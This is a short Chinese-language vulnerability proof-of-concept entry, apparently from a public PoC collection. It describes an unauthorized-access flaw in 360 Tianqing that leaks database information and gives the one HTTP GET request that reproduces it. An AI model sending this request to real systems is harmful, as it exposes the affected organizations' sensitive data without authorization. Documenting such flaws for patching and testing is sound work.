Awesome-POC/Web应用漏洞/360天擎 gettablessize 数据库信息泄露漏洞.md

21 lines
337 B
Markdown
Raw Normal View History

2022-05-17 17:43:20 +08:00
# 360天擎 越权访问/数据库信息泄露
## 漏洞描述
360天擎 存在未授权越权访问,造成敏感信息泄露
## 漏洞影响
```
天擎
```
## 漏洞复现
```plain
GET /api/dbstat/gettablessize HTTP/1.1
```
![image-20220209200552429](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092005904.png)